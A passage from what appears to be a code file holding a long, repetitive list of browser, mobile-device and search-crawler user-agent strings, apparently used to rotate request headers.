Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 